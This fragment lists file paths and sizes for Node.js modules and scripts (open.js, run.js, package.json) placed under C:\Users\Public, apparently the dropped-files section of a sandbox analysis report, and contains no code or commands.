                  • C:\Users\Public\node_modules\normalize-path\package.json

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\process-nextick-args\index.js

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\process-nextick-args\package.json

                    Filesize

                    578B

                  • C:\Users\Public\node_modules\readdir-glob\index.js

                    Filesize

                    6KB

                  • C:\Users\Public\node_modules\readdir-glob\package.json

                    Filesize

                    1KB

                  • C:\Users\Public\node_modules\util-deprecate\node.js

                    Filesize

                    123B

                  • C:\Users\Public\node_modules\util-deprecate\package.json

                    Filesize

                    694B

                  • C:\Users\Public\node_modules\zip-stream\LICENSE

                    Filesize

                    1KB

                  • C:\Users\Public\open.js

                    Filesize

                    407B

                  • C:\Users\Public\package.json

                    Filesize

                    80B

                  • C:\Users\Public\run.js

                    Filesize

                    1KB
